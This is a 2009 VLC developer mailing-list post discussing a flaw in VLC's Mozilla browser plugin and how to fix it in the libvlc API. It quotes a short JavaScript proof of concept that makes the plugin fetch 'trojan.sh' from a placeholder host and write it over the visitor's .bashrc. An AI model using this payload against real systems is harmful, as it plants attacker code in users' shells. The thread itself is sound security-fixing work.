[vlc-devel] Regarding the seemingly still "obscure" security problem

Laurent Aimar fenrir at via.ecp.fr
Sun Jan 18 15:21:31 CET 2009


On Sat, Jan 17, 2009, Rémi Denis-Courmont wrote:
> Le samedi 17 janvier 2009 17:34:04 Jean-Baptiste Kempf, vous avez écrit :
> > On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> > > <script type="text/javascript"><!--
> > >   var vlc = document.getElementById("vlc");
> > >   var src = "http/dump://www.example.com/trojan.sh";
> > >   var dst = ".bashrc";
> > >   vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
> > >   vlc.playlist.play ();
> > > //!--></script>
> > > </body>
> > > </html>
> >
> > I think this was brought to attention during the summit.
> >
> > One question is: could we, in the plugin call add( ),
> > detect demuxdump, sout and file-logging options and in that case,
> > warn the user that some file will be overwritten?
> 
> The core has had safe and unsafe options for this purpose for a year already. 
> The stupid Mozilla plugin (and perhaps others) is obviously not setting the 
> trusted flag properly.

 I have changed playlist API to make sure you have to manually specify 
VLC_INPUT_OPTION_TRUSTED
 to have an option trusted.

The libvlc API exposes only two functions that force VLC_INPUT_OPTION_TRUSTED:
 - libvlc_media_add_option
 - libvlc_playlist_add_extended

The mozilla plugin is using libvlc_playlist_add_extended :(

 The problem I see is that libvlc API has no way to add options without
making them trusted.
 So libvlc need a new version which will not make options trusted of
libvlc_media_add_option and libvlc_playlist_add_extended.
 Then the mozilla plugin must be updated to use them.

-- 
fenrir




More information about the vlc-devel mailing list